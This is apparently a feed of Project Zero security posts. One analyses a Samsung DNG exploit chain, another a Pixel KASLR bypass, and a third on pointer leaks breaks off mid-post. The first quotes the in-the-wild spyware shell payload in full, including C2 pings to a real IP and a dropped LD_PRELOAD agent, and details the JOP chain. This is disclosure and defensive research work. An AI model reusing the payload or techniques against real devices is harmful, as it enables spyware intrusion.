    00007800: f0fc f8cc 7f00 0000 0600 0000 0100 0401  // TrimBounds opcode X

    00007810: 0100 0000 0100 0000 0300 0000 0000 0000  

    00007820: 0000 0000 0100 0000 0100 0000 0000 0000  

    00007830: 0301 0300 0000 71ca 0000 0000 0000 0000  

    00007840: f0fc f8cc 7f00 0000 0600 0000 0100 0401  // TrimBounds opcode Y


    After:

    00007800: 30fd f8cc 7f00 0000 0600 0000 0000 0401  

               | |                           \-\---> Will prevent bailout in QuramDngOpcode::aboutToApply

               \---> changed vtable pointer, from TrimBounds to MapTable 

    00007810: 0100 0000 0100 0000 0300 0000 0000 0000  // Arguments of bogus Maptable,

    00007820: 0028 0000 0100 0000 982c 0000 0000 0000  // such as top, left, bottom, right,

    00007830: 0100 0000 0100 0000 0100 0000 0000 0000  // plane, planes, ...

    00007840: f0fc f8cc 7f00 0000 0600 0000 0100 0401 

              \-\--\-\--\-\--\-\----> vtable of the neighboring TrimBounds opcode, interpreted here

                                      as the pointer to the MapTable's substitution table 


    The whole goal of this construction is to have the vtable of another opcode object as the pointer for the MapTable substitution table. If we zero out the memory this MapTable will be applied to beforehand, this will result in a read of two bytes from the TrimBounds vtable, i.e. a leak.



    /-< Zero'ed memory at offset 0xf000:                   0000 0000 0000 0000 0000 ...

    |

    |-< MapTable substitution table (TrimBounds vtable):   04b2 a4cd 7f00 0000 a85e ....

    |

    \-> Transformed memory at offset 0xf000:               04b2 04b2 04b2 04b2 04b2 ....


    Leaking interesting pointers

    Using the above technique, we can leak arbitrary values at offsets from the TrimBounds vtable. We demonstrated this for offset 0, but the same idea can be applied for other offsets (up to 65536, the maximum index into the substitution table).


    Say you want to leak a pointer at offset 0x1f8 from the TrimBounds vtable. This can be achieved in the following way:



    /-< Prepared memory at offset 0xf000:                                   f001 f101 f201 f301 ...

    |

    |-< MapTable substitution table (TrimBounds vtable) at offset 0x1f0:    4c5a ebcc 7f00 0000 ....

    |

    \-> Transformed memory at offset 0xf000:                                4c5a ebcc 7f00 0000 ....


    But again, the exploit needs to support different library versions. These different library versions have pointers to leak at different offsets from the vtable. But based on the first leak at offset 0, we can “calculate” the right offsets to leak using another MapTable operation.


    In summary the process goes as follows (illustrated below):

    1. Corrupt a TrimBounds opcode into a MapTable object with the substitution table pointing at the TrimBounds vtable.

    2. Have the bogus MapTable opcode process an area of all zeros. The substituted values will be the lower 2 bytes of the first vtable entry (which is the address of QuramDngOpcode::~QuramDngOpcode()). The top nibble will depend on the ASLR slide, and the lower 3 nibbles will be version dependent.

    3. Using MapTable opcodes with well prepared substitution tables (supporting different ASLR slides and library versions), substitute those values to the offset between the TrimBounds vtable and the address of the pointer to leak.

    4. Similar to step 1, corrupt another TrimBounds opcode into a MapTable object with the substitution table pointing at the TrimBounds vtable.

    5. The bogus MapTable will now substitute the offsets from the vtable into their respective values, effectively writing a leaked pointer into memory.



    The memory used for preparing these pointers is at offset 0xf000 from the raw pixel buffer, which contains the last series of 1040 “unknown” opcodes. This memory will become the JOP chain.


    The leaked pointers are mostly pointers to functions inside libimagecodec.quram.so, as well as the value of libc’s __system_property_get, which is located in the GOT. Conveniently the .got segment is located after the TrimBounds’s vtable, and within a 65536 bytes offset.


    Preparing the payload

    By using more MapTable operations, we can change the leaked pointers to the JOP gadget addresses we are interested in. The leaked libc pointer is changed to the address of system.


    This is an overview of the leaked pointers and to what they are changed:


    Raw pixel buffer offset

    Leaked value

    Remapped value for JOP chain

    0xf000

    QuramDngFunctionExposureRamp::~QuramDngFunctionExposureRamp()

    qpng_check_fp_number@got.plt

    0xf038

    QuramDngFunctionExposureRamp::evaluate(double)

    qpng_check_IHDR+624

    0xf118

    QuramDngException::~QuramDngException()

    __ink_jpeg_enc_process_image_data+64

    0xf138

    QuramDngException::~QuramDngException()

    __ink_jpeg_enc_process_image_data+64

    0xf928

    QuramDngFunctionExposureRamp::evaluate(double)

    QURAMWINK_Read_IO2+124

    0x10928

    __system_property_get_ptr

    system

    A long shell command is also prepared at offset 0x10000 from the raw pixel buffer, which also falls in that 1040 Unknown opcodes region.


    We end up with:

    •  a JOP chain prepared at 0xf000. Note that it is preceded by one of the 1040 Unknown opcodes with opcode ID 23 (0x17)



    • a shell command at offset 0x10000. Note again how it is within the region of the Unknown opcodes


    Triggering the JOP chain

    Similar to our initial corruption, we increment values between 0x2800 and 0x6400 with 1, but this time at offset 0x22 within the objects, using DeltaPerColumn opcodes. The opcode objects there have been executed by now, so this does not affect them. However, the QuramDngImage is also there and offset 0x20 in the QuramDngImage is a pointer to the raw pixel buffer. By adding 1 to offset 0x22, we basically shift the raw pixel buffer pointer with 0x10000 bytes, pointing it right at the shell command.


    Finally, the DNG decoder will execute that last series of 1040 “unknown” opcodes. Offset 0xf000 - where we prepared our JOP chain - falls nicely on the boundary of one of those opcodes, so it will be executed as another opcode.


    QuramDngOpcode::aboutToApply reads the bogus vtable pointer at raw pixel buffer offset 0xf000 and calls the fourth function in it, which will be qpng_read_data.


    QuramDngOpcodeUnknown *__fastcall QuramDngOpcode::aboutToApply(QuramDngOpcode *opcode, QuramDngDecoder *decoder)

    {

        int v2; // w8

        QuramDngOpcodeUnknown *v5; // x0

        unsigned int v6; // w1


        v2 = *((_DWORD *)opcode + 4);

        if ( (v2 & 2) != 0 && *((_BYTE *)decoder + 34) )

        {

            *((_BYTE *)decoder + 5377) = 1;

            return 0;

        }

        if ( *((_DWORD *)opcode + 3) >= 0x1040001u && *((_BYTE *)opcode + 0x14) )

        {

            if ( (v2 & 1) != 0 )

                return 0;

            Throw_dng_error(-9994, 0, "QuramDngOpcode::aboutToApply 1", 0);

        }

        if ( ((*(__int64 (__fastcall **)(QuramDngOpcode *, QuramDngDecoder *))(*(_QWORD *)opcode + 0x18LL))(opcode, decoder) // bogus vtable dereference

            & 1) != 0 )

        {

            return (QuramDngOpcodeUnknown *)(((*(__int64 (__fastcall **)(QuramDngOpcode *))(*(_QWORD *)opcode + 16LL))(opcode)

                                            & 1) == 0);

        }

        else

        {

            v5 = (QuramDngOpcodeUnknown *)Throw_dng_error(-9994, 0, "QuramDngOpcode::aboutToApply 2", 0);

            return QuramDngOpcodeUnknown::QuramDngOpcodeUnknown(v5, v6);

        }

    }



    .got:00000000002E3390 qpng_check_fp_number_ptr DCQ qpng_check_fp_number  // address of vtable placed at offset 0xf000

    .got:00000000002E3398 _ZNK17QuramDngSrational9getReal64Ev_ptr DCQ QuramDngSrational::getReal64(void)

    .got:00000000002E33A0 qpng_write_IHDR_ptr DCQ qpng_write_IHDR 

    .got:00000000002E33A8 qpng_read_data_ptr DCQ qpng_read_data  // bogus vtable entry that will be called


    When qpng_read_data gets called, x0 will point to the opcode, as it is a method call. x1 points to the decoder, but is not important for the JOP chain. x2 is not specifically set up for this function call, but it still points to the QuramDngImage from QuramDngOpcodeList::doApply higher up the stack (it has not been clobbered). x2 pointing to the QuramDngImage is important for the JOP chain.


    qpng_read_data will move x0 into x19 and call the next gadget, __ink_jpeg_enc_process_image_data+64.



    qpng_read_data:

    0000000000196684    STP  X20, X19, [SP,#-0x10+var_10]!

    0000000000196688    STP  X29, X30, [SP,#0x10+var_s0]

    000000000019668C    ADD  X29, SP, #0x10

    0000000000196690    LDR  X8, [X0,#0x138]                ; x8: __ink_jpeg_enc_process_image_data+64

    0000000000196694    MOV  X19, X0                        ; x19: opcode (offset 0xf000 from the raw pixel buffer)

    0000000000196698    CBZ  X8, loc_1966C0

    000000000019669C    MOV  X0, X19

    00000000001966A0    MOV  X20, X2                        ; x20: QuramDngImage

    00000000001966A4    BLR  X8                             ; __ink_jpeg_enc_process_image_data+64

     

    We jump in the middle of __ink_jpeg_enc_process_image, which adds 0x20 to the QuramDngImage pointer, having x1 point at the address that contains the raw pixel buffer pointer:


    __ink_jpeg_enc_process_image_data+64:

    0000000000161664    LDR  X8, [X19,#0x928]  ; x19: opcode (offset 0xf000 from the raw pixel buffer)

                                               ; x8: QURAMWINK_Read_IO2+124

    0000000000161668    ADD  X1, X20, #0x20    ; x20: QuramDngImage 

                                               ; x1: address of QuramDngImage.raw_pixel_buffer

    000000000016166C    MOV  X0, X19           ; not relevant

    0000000000161670    BLR  X8                ; QURAMWINK_Read_IO2+124


    QURAMWINK_Read_IO2+124 then dereferences x1, which loads the raw pixel buffer pointer into x1:


    QURAMWINK_Read_IO2+124:

    0000000000154548    LDR  X8, [X19,#0x38]  ; x19: opcode (offset 0xf000 from the raw pixel buffer)

                                              ; x8: qpng_check_IHDR+624

    000000000015454C    LDR  X0, [X19,#8]     ; clobbers x0

    0000000000154550    LDR  X1, [X1]         ; x1: dereference address of QuramDngImage.raw_pixel_buffer,

                                              ;     so x1 points to the raw pixel buffer, which was increased

                                              ;     with 0x10000 and now points at the shell command

    0000000000154554    BLR  X8               ; qpng_check_IHDR+624

    qpng_check_IHDR+624 calls qpng_error, which copies the raw pixel buffer pointer from x1 into x19:


    qpng_check_IHDR+624:

    0000000000189608    MOV  X0, X19                        ; x19: opcode (offset 0xf000 from the raw pixel buffer)

    000000000018960C    BL   .qpng_error


    qpng_error:

    000000000018BD30    STP  X20, X19, [SP,#-0x10+var_10]!  

    000000000018BD34    STP  X29, X30, [SP,#0x10+var_s0]

    000000000018BD38    ADD  X29, SP, #0x10

    000000000018BD3C    MOV  X19, X1                        ; x19: address of shell command

    000000000018BD40    MOV  X20, X0

    000000000018BD44    CBZ  X0, loc_18BD5C

    000000000018BD48    LDR  X8, [X20,#0x118]               ; x8: __ink_jpeg_enc_process_image+64

    000000000018BD4C    CBZ  X8, loc_18BD5C

    000000000018BD50    MOV  X0, X20                       

    000000000018BD54    MOV  X1, X19                       

    000000000018BD58    BLR  X8                             ; __ink_jpeg_enc_process_image+64


    We execute a second time the __ink_jpeg_enc_process_image+64 gadget, which copies the raw pixel buffer pointer into x0 and calls system. The raw pixel buffer was corrupted before the JOP chain to point at the shell command, resulting in a system(<shell_command>) call.


    __ink_jpeg_enc_process_image+64:

    0000000000161664    LDR  X8, [X19,#0x928]  ; x19: address of shell command

                                               ; x8: system

    0000000000161668    ADD  X1, X20, #0x20

    000000000016166C    MOV  X0, X19           ; x0: address of shell command

    0000000000161670    BLR  X8                ; system


    Below is a summary of the sequence of gadgets and their purpose:



    Gadget

    Relevant instructions

    Purpose

    qpng_read_data

    MOV X19, X0

    MOV X20, X2

    Copy the opcode address into x19 and the QuramDngImage address into x20

    __ink_jpeg_enc_process_image_data+64

    ADD X1, X20, #0x20

    Have x1 point at QuramDngImage+0x20 (which contains the raw pixel buffer pointer)

    QURAMWINK_Read_IO2+124

    LDR X1, [X1]

    Dereference x1, so it contains the raw pixel buffer pointer

    qpng_check_IHDR+624 qpng_error

    MOV X19, X1

    Copy the raw pixel buffer pointer from x1 into x19

    __ink_jpeg_enc_process_image+64

    LDR X8, [X19,#0x928]
    MOV X0, X19
    BLR X8

    Copy the raw pixel buffer from x19 into x0 and call system. The raw pixel buffer was corrupted before the JOP chain to point at the shell command

    system


    Execute the shell command


    Payload

    The payload shell command is:


    /system/bin/sh -c 'ping -c 1 -w1 -p 2066c1d8ce2834f1fbb1296f9dca73419 91.132.92.35 >/dev/null & '; pid=`cat /proc/self/stat | cut -F 4` && ppid=`cat /proc/$pid/stat | cut -F 4`;

    rm -f /data/data/com.samsung.ipservice/files/b.so;

    rm -f /data/data/com.samsung.ipservice/files/z.zip;

    image=`find /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp\ Images/ /storage/emulated/95/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1000/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1001/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1002/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1003/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1004/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1005/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1006/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1007/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1008/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1009/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1010/Media/WhatsApp\ Images/ -type f -atime -720m -maxdepth 1 -exec grep -lo '.*066c1d8ce2834f1fbb1296f9dca73419.*' {} \; -quit 2>/dev/null` ;

    /system/bin/sh -c 'ping -c 1 -w1 -p $(test "$image" && echo 31066c1d8ce2834f1fbb1296f9dca73419 || echo 30066c1d8ce2834f1fbb1296f9dca73419) 91.132.92.35 >/dev/null & ' ;

    tail -c $(( 390245 )) "$image" > /data/data/com.samsung.ipservice/files/z.zip && unzip -o -d / /data/data/com.samsung.ipservice/files/z.zip && chmod +x /data/data/com.samsung.ipservice/files/b.so;

    R=I SEP=CAFEBABE LD_PRELOAD=/data/data/com.samsung.ipservice/files/b.so /system/bin/id;

    content write --uri "content://com.samsung.cmh/files?service_flag=update%20files%20SET%20serviceflag%3D%20serviceflag%7C66304";

    kill -9 $ppid


    It performs a series of actions:


    • It will ping a C2 server with a custom identifier

    • It deletes previous dropped artifacts, if any.

    • It searches through all WhatsApp images for itself (using a unique string)

    • It unzips b.so from itself into /data/data/com.samsung.ipservice/files/b.so. Effectively, it is a polyglot of a DNG and ZIP file.

      • Note that only the com.samsung.ipservice process is allowed to write here, which confirms this is the targeted process.

    • The second-to-last command contains the following service_flag URL decoded: update files SET serviceflag= serviceflag|66304 . That last value (0x10300)  is a flag bitmask that will set the IPService, FaceService and StoryService in com.samsung.cmh’s files table. These flags are used by the different services to track which files they need to process (flag bit set to 0) and have already processed (flag bit set to 1). The likely objective of the attackers here is to prevent future reparsing by these services of the images.


    Finally it runs b.so, the agent.

    Fix

    Curiously, this issue was silently fixed in Samsung’s April 2025 updates. In September 2025, a CVE was assigned (CVE-2025-21042) by Samsung and the security bulletin updated. Note that not all supported Samsung devices are serviced monthly security updates. Some devices are part of a quarterly or biannual security update schedule, which means they might have received the fix at a later date. On December 11, 2025, Samsung told us the following: "patches for SVE-2025-1959 have been deployed to all devices supported by Security Update, without exception."


    The fixed function now looks like below (simplified version). The bold parts are the added checks.



    __int64 __fastcall QuramDngOpcodeDeltaPerColumn::processArea(

            QuramDngOpcode *opcode,

            QuramDngDecoder *decoder,

            QuramDngImage *image,

            QuramDngRect *rect)

    {

    ...

        image_buffer = image->buffer;

    ...

                    image_number_of_planes = image_buffer->planes;  // 3

                    opcode_first_plane = opcode->plane;  // 5125

    ....

                    opcode_number_of_planes = opcode->planes;  // 5123

                    opcode_last_plane = opcode_first_plane + opcode_number_of_planes;  // 5125 + 5123 = 10248

    ...


                        if ( opcode_first_plane < opcode_last_plane // 5125 < 10248

                            && opcode_first_plane < image_number_of_planes )  // 5125 < 3

                        {

    ...  // We will never go here

                                current_plane = opcode_first_plane;

    ...

                                    do

                                    {

    ...                                 // Add delta to the value in the raw pixel buffer at offset corresponding to plane `current_plane`

                                        current_plane++;

                                    }

                                    while ( current_plane < opcode_last_plane 

                                           && current_plane < image_number_of_planes );

    ...

    }


    As we can see from the fix:


    • The opcode_last_plane is now calculated correctly.

    • Before dereferencing the raw pixel buffer, a check is performed that the current_plane is within the number of planes of the image.

    Mitigations

    Except for some ASLR bypassing tricks and a little bit of JOP work, no mitigations posed a significant hurdle for the attackers:


    • No control flow integrity mitigations, like PAC or BTI, are compiled into the Quram library. This allowed the attackers to use arbitrary addresses as JOP gadgets and construct a bogus vtable.

    • The “hardened” scudo allocator wasn’t an obstacle either. The heap spraying primitives - more or less inherent to the DNG format - are quite powerful and allow for a well predicted heap layout, even in the presence of scudo’s randomization strategy. The absence of the quarantine feature is also convenient to deterministically reclaim the spot of the stage 2 image.


    MTE would likely have prevented both:


    • the initial vulnerability trigger to corrupt the image dimensions

    • the hundreds of subsequent out of bounds MapTable and DeltaPerColumn operations


    preventing reliable exploitation of this vulnerability, at least with the current exploit strategy.

    Conclusion

    This case illustrates how certain image formats provide strong primitives out of the box for turning a single memory corruption bug into interactionless ASLR bypasses and remote code execution. By corrupting the bounds of the pixel buffer using the bug, the rest of the exploit could be performed by using the “weird machine” that the DNG specification and its implementation provide.


    The bug exploited in this case is quite shallow and could have been found manually or through fuzzing. As Project Zero’s Reporting Transparency illustrates, several other vulnerabilities in the same component have been discovered.


    These types of exploits do not need to be part of long and complex exploit chains to achieve something useful for attackers. By finding ways to reach the right attack surface and using a single vulnerability, attackers are able to access all the images and videos of an Android’s media store, which is a very interesting capability for spyware vendors.


    I would like to thank everyone who contributed to this analysis:


    • Meta for the initial leads

    • Brendon Tiszka of Google Project Zero for the research on how the com.samsung.ipservice attack surface can be reached and the followup research he performed into the Quram library, leading to several more discoveries.

    • Clement Lecigne of Google Threat Intelligence Group for assisting in the analysis


    • ✇Project Zero
    • Defeating KASLR by Doing Nothing at All Google Project Zero
       Posted by Seth Jenkins, Project ZeroIntroductionI've recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive…but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping.The Linux Linear MappingThe linear mapping is a region in the kernel virtual address space that is a direct 1:1 unstructured representation of physical memory. Working w
       

    Defeating KASLR by Doing Nothing at All

    3 de Novembro de 2025, 15:09

     Posted by Seth Jenkins, Project Zero

    Introduction

    I've recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive…but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping.

    The Linux Linear Mapping

    The linear mapping is a region in the kernel virtual address space that is a direct 1:1 unstructured representation of physical memory. Working with Jann, I learned how the kernel decided where to place this region in the virtual address space. To make it possible to analyze kernel internals on a rooted phone, Jann wrote a tool to call tracing BPF's privileged BPF_FUNC_probe_read_kernel helper, which by design permits arbitrary kernel reads. The code for this is available here. The linear mapping virtual address for a given physical address is calculated by the following macro:

    #define phys_to_virt(x)    ((unsigned long)((x) - PHYS_OFFSET) | PAGE_OFFSET)


    On Arm64 PAGE_OFFSET is simply:


    #define VA_BITS (CONFIG_ARM64_VA_BITS)

    #define _PAGE_OFFSET(va) (-(UL(1) << (va)))

    #define PAGE_OFFSET (_PAGE_OFFSET(VA_BITS))


    As CONFIG_ARM64_VA_BITS is 39 on Android, it’s easy to calculate PAGE_OFFSET = 0xffffff8000000000.

    PHYS_OFFSET is calculated by:

    extern s64 memstart_addr;

    /* PHYS_OFFSET - the physical address of the start of memory. */

    #define PHYS_OFFSET ({ VM_BUG_ON(memstart_addr & 1); memstart_addr; })


    memstart_addr is an exported variable that can be looked up in /proc/kallsyms. Using Jann’s bpf_arb_read program, it’s easy to see what this value is:


    tokay:/ # grep memstart /proc/kallsyms                                         

    ffffffee6d3b2b20 D memstart_addr

    ffffffee6d3f2f80 r __ksymtab_memstart_addr

    ffffffee6dd86cc8 D memstart_offset_seed

    tokay:/ # cd /data/local/tmp

    tokay:/data/local/tmp # ./bpf_arb_read ffffffee6d3b2b20 8                                              <

    ffffffee6d3b2b20  00 00 00 80 00 00 00 00                          |........|

    tokay:/data/local/tmp #


    This value (0x80000000) doesn’t look particularly random. In fact, memstart_addr was theoretically randomized on every boot, but in practice this hasn’t happened for a while on arm64. In fact as of commit 1db780bafa4c it’s no longer even theoretical - virtual address randomization of the linear map is no longer a supported feature in arm64 Linux kernel.


    The systemic issue is that memory can (theoretically) be hot plugged in Linux and on Android because of CONFIG_MEMORY_HOTPLUG=y. This feature is enabled on Android due to its usage in VM memory sharing. When new memory is plugged into an already running system, it must be possible for the Linux kernel to address this new memory, including adding it onto the linear map. Android on arm64 uses a page size of 4 KiB and 3-level paging, which means virtual addresses in the kernel are limited to 39 bits, unlike typical X86-64 desktops which use 4-level paging and have 48 bits of virtual address space (for kernel and userspace combined); the linear map has to fit within this space further shrinking the area available for it. Given that the maximum amount of theoretical physical memory is far larger than the entire possible linear map region range, the kernel places the linear map at the lowest possible virtual address so it can theoretically be prepared to handle exorbitant (up to 256GB) quantities of hypothetical future hot-plugged physical memory. While it is not technically necessary to choose between memory hot-plugging support and linear map randomization, the Linux kernel developers decided not to invest the engineering effort to implement memory hot-plugging in a way that preserves linear map randomization.


    So we now know that PHYS_OFFSET will always be 0x80000000, and thusly, the phys_to_virt calculation becomes purely static - given any physical address, you can calculate the corresponding linear map virtual address by the following formula:

    #define phys_to_virt(x)    ((unsigned long)((x) - 0x80000000) | 0xffffff8000000000)

    Kernel physical address non-randomization

    Compounding this issue, it also happens that on Pixel phones, the bootloader decompresses the kernel itself at the same physical address every boot: 0x80010000.


    tokay:/ # grep Kernel /proc/iomem

      80010000-81baffff : Kernel code

      81fc0000-8225ffff : Kernel data


    Theoretically, the bootloader can place the kernel at a random physical address every boot, and many (but not all) other phones, such as the Samsung S25, do this. Unfortunately, Pixel phones are an example of a device that simply decompresses the kernel at a static physical address.

    Calculating static kernel virtual addresses

    This means that we can statically calculate a kernel virtual address for any kernel .data entry. Here’s an example of me computing that linear map address for the modprobe_path string in kernel .data on a Pixel 9:


    tokay:/ # grep modprobe_path /proc/kallsyms                                    

    ffffffee6ddf2398 D modprobe_path

    tokay:/ # grep stext /proc/kallsyms                                            

    ffffffee6be10000 T _stext

    //Offset from kernel base will be 0xffffffee6ddf2398 - 0xffffffee6be10000 = 0x1fe2398

    //Physical address will be 0x80010000 + 0x1fe2398 = 0x81ff2398

    //phys_to_virt(0x81ff2398) = 0xffffff8001ff2398

    tokay:/ # /data/local/tmp/bpf_arb_read ffffff8001ff2398 64                     

    ffffff8001ff2398  00 73 79 73 74 65 6d 2f 62 69 6e 2f 6d 6f 64 70  |.system/bin/modp|

    ffffff8001ff23a8  72 6f 62 65 00 00 00 00 00 00 00 00 00 00 00 00  |robe............|

    [ zeroes ]

    tokay:/ # reboot                                                                                                         sethjenkins@sethjenkins91:~$ adb shell

    tokay:/ $ su

    tokay:/ # /data/local/tmp/bpf_arb_read ffffff8001ff2398 64

    ffffff8001ff2398  00 73 79 73 74 65 6d 2f 62 69 6e 2f 6d 6f 64 70  |.system/bin/modp|

    ffffff8001ff23a8  72 6f 62 65 00 00 00 00 00 00 00 00 00 00 00 00  |robe............|

    [ zeroes ]

    tokay:/ #


    So modprobe_path will always be accessible at the kernel virtual address 0xffffff8001ff2398, in addition to its normal mapping, even with KASLR enabled. In practice, on Pixel devices you can derive a valid virtual address for a kernel symbol by calculating its offset and simply adding a hardcoded static kernel base address of 0xffffff8000010000. In short, instead of breaking the KASLR slide, it is possible to just use 0xffffff8000010000 as a kernel base instead.


    The linear mapping memory is even mapped rw for any kernel .data regions. The only consolation that makes using this address slightly less effective than the traditional method of leaking the KASLR slide is that .text regions are not mapped executable - so an attacker cannot use this base for e.g. ROP gadgets or more generally PC control. But oftentimes, a Linux kernel attacker’s goal isn’t arbitrary code execution in kernel context anyway - arbitrary read-write is the more frequently desired primitive.

    Impact on devices with kernel physical address randomization


    Even on devices where the kernel location is randomized in the physical address space, linear mapping non-randomization still softens the kernel considerably to attempts at exploitation. This is particularly because techniques that involve spraying memory (either kernel structures or even userland mmap’s!) can land at predictable physical addresses - and those physical addresses are easily referenceable in kernel virtual address space through the linear map. That potentially gives an attacker a methodology for placing kernel data structures or even simply attacker-controlled userland memory at a known kernel virtual address. I created a simple program that allocated (via mmap and page fault) a substantial quantity (~5 GB)  of physical memory on a Samsung S23, then used /proc/pagemap to create a list of which physical page frame numbers (pfns) were allocated. I ran this program 100 times (rebooting in between each time), then counted how often each pfn appeared across the 100 execution cycles. The set of pfns and their counts for how often they appeared were then converted into an image where each pfn is represented by a single pixel. The brighter the green of a pixel, the more often that page was attacker controlled, with a white pixel representing a pfn that was allocated every time. A black pixel represents a pfn that was never allocated - often because those pfn numbers are not mapped to physical memory or because they are used every time in a deterministic way. A big thank you to Jann Horn for developing the tool to create this image from the data that I collected.




    This data exemplifies the non-homogenous reliability of pfn allocation to userland mappings, albeit on a device that was only just rebooted. There are ranges of pfns that are allocated quite reliably, and other ranges that are quite unreliable (but still occasionally used). For example, here’s a range of pfns surrounding one of the pages that was allocated 100 times in a row. I suspect this sample is representative of the practical reliability of this technique for placing desired data at a known kernel address for at least a newly rebooted device.



    While reliability may suffer on a device that hasn’t rebooted in some time, it remains high enough to be inviting to real-world attackers. Being able to place arbitrarily readable and writable data at a known kernel virtual address is a powerful exploitation primitive as an attacker can much more easily forge kernel data structures or objects and, for example, emplace pointers to those objects in heap sprays attacking UAF issues.

    The Prognosis

    I reported these two separate issues, lack of linear map randomization, and kernel lands at static physical address in Pixel, to the Linux kernel team and Google Pixel respectively. However both of these issues are considered intended behavior. While Pixel may introduce randomized physical kernel load addresses at some later point as a feature, there are no immediate plans to resolve the lack of randomization of the Linux kernel’s linear map on arm64.

    Conclusion

    Three years ago, I wrote on the state of x86 KASLR and noted how “it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.” While it remains true that KASLR should not be trusted to prevent exploitation, particularly in local contexts, it is regrettable that the attitude around Linux KASLR is so fatalistic that putting in the engineering effort to preserve its remaining integrity is not considered to be worthwhile. The joint effect of these two issues dramatically simplified what might otherwise have been a more complicated and likely less reliable exploit. While side-channel attacks do impact the long-term viability of KASLR on all architectures, it is notable that Project Zero and the Google Threat Intelligence Group have yet to see a hardware side-channel attack for bypassing KASLR on Android in the wild. Additionally, KASLR still plays an important role in mitigating any remote kernel exploitation attempts. It is valuable from a security in-depth perspective to recognize the impact KASLR has on exploit complexity and reliability in real-world scenarios. In the future, we hope to see changes to the Linux kernel linear mapping and memory hot-plugging implementation to make this a less inviting target for attackers. Randomizing the location of the linear map in the virtual address space, increasing the entropy in physical page allocation, and randomizing the location of the kernel in the physical address space are all concrete steps that can be taken that would improve the overall security posture of Android, the Linux kernel, and Pixel.


    • ✇Project Zero
    • Pointer leaks through pointer-keyed data structures Google Project Zero
      Posted by Jann Horn, Google Project Zero IntroductionSome time in 2024, during a Project Zero team discussion, we were talking about how remote ASLR leaks would be helpful or necessary for exploiting some types of memory corruption bugs, specifically in the context of Apple devices. Coming from the angle of "where would be a good first place to look for a remote ASLR leak", this led to the discovery of a trick that could potentially be used to leak a pointer remotely, without any memory safety
       

    Pointer leaks through pointer-keyed data structures

    26 de Setembro de 2025, 14:00

    Posted by Jann Horn, Google Project Zero

    Introduction

    Some time in 2024, during a Project Zero team discussion, we were talking about how remote ASLR leaks would be helpful or necessary for exploiting some types of memory corruption bugs, specifically in the context of Apple devices. Coming from the angle of "where would be a good first place to look for a remote ASLR leak", this led to the discovery of a trick that could potentially be used to leak a pointer remotely, without any memory safety violations or timing attacks, in scenarios where an attack surface can be reached that deserializes attacker-provided data, re-serializes the resulting objects, and sends the re-serialized data back to the attacker.

    The team brainstormed, and we couldn't immediately come up with any specific attack surface on macOS/iOS that would behave this way, though we did not perform extensive analysis to test whether such attack surface exists. Instead of targeting a real attack surface, I tested the technique described here on macOS with an artificial test case that uses NSKeyedArchiver serialization as the target. Because of the lack of demonstrated real-world impact, I reported the issue to Apple without filing it in our bugtracker. It was fixed in the 31 Mar 2025 security releases. Links to Apple code in this post go to an outdated version of the code that hasn't been updated in years, and descriptions of how the code works refer to the old unfixed version.

    I decided to write about the technique since it is kind of intriguing and novel, and some of the ideas in it might generalize to other contexts. It is closely related to a partial pointer leak and another pointer ordering leak that I discovered in the past, and shows how pointer-keyed data structures can be used to leak addresses under ideal circumstances.

    Background - the tech tree

    hashDoS

    To me, the story of this issue begins in 2011, when the hashDoS attack was presented at 28C3 (slides, recording). In essence, hashDoS is a denial-of-service attack on services (in particular web servers) that populate hash tables with lots of attacker-controlled keys (like POST parameters). It is based on the observation that many hash table implementations have O(1) complexity per insert/lookup operation in the average case, but O(n) complexity for the same operations in the worst case (where the hashes of all keys land in the same hash bucket, and the hash table essentially turns into something like a linked list or an unsorted array depending on how it is implemented). In particular if the hash function used for keys is known to the attacker, then by constructing a request full of parameters whose keys all map to the same hash bucket, an attacker can cause the server to spend O(n²) time processing such a request; this turned out to be enough to keep a web server's CPU saturated using ridiculously small amounts of network traffic.

    There is also much older prior work on the idea of deliberately creating hash table collisions to leak addresses, as pointed out in a 29C3 talk about the same topic. Solar Designer wrote in Phrack issue 53 back in 1998:

    ----[ Data Structures and Algorithm Choice

    When choosing a sorting or data lookup algorithm to be used for a normal application, people are usually optimizing the typical case. However, for IDS [intrusion detection systems] the worst case scenario should always be considered: an attacker can supply our IDS with whatever data she likes. If the IDS is fail-open, she would then be able to bypass it, and if it's fail-close, she could cause a DoS for the entire protected system.

    Let me illustrate this by an example. In scanlogd, I'm using a hash table to lookup source addresses. This works very well for the typical case as long as the hash table is large enough (since the number of addresses we keep is limited anyway). The average lookup time is better than that of a binary search. However, an attacker can choose her addresses (most likely spoofed) to cause hash collisions, effectively replacing the hash table lookup with a linear search. Depending on how many entries we keep, this might make scanlogd not be able to pick new packets up in time. This will also always take more CPU time from other processes in a host-based IDS like scanlogd.

    [...]

    It is probably worth mentioning that similar issues also apply to things like operating system kernels. For example, hash tables are widely used there for looking up active connections, listening ports, etc. There're usually other limits which make these not really dangerous though, but more research might be needed.

    hashDoS as a timing attack

